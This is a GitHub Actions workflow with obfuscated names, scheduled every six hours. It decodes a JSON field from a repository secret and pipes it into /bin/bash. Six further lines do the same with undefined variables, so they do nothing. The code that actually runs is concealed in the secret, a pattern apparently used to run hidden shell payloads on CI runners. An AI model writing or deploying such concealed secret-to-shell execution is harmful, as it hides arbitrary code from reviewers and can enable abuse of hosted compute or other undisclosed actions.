name: fanglinhaidan
on:
  workflow_dispatch:
  schedule:
    - cron: '13 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fanglinhaidan
        env:
          sklnk6: ${{ secrets.sklnk6 }}
        run: |
          echo $sklnk6 | jq -r .thn058 | /bin/bash
          echo $lb5 | jq -r .j0946 | /bin/bash
          echo $t9 | jq -r .k85 | /bin/bash
          echo $d0750 | jq -r .i59 | /bin/bash
          echo $qugvu2 | jq -r .rhfmc1 | /bin/bash
          echo $epyp72 | jq -r .q290 | /bin/bash
          echo $lui127 | jq -r .vzc539 | /bin/bash

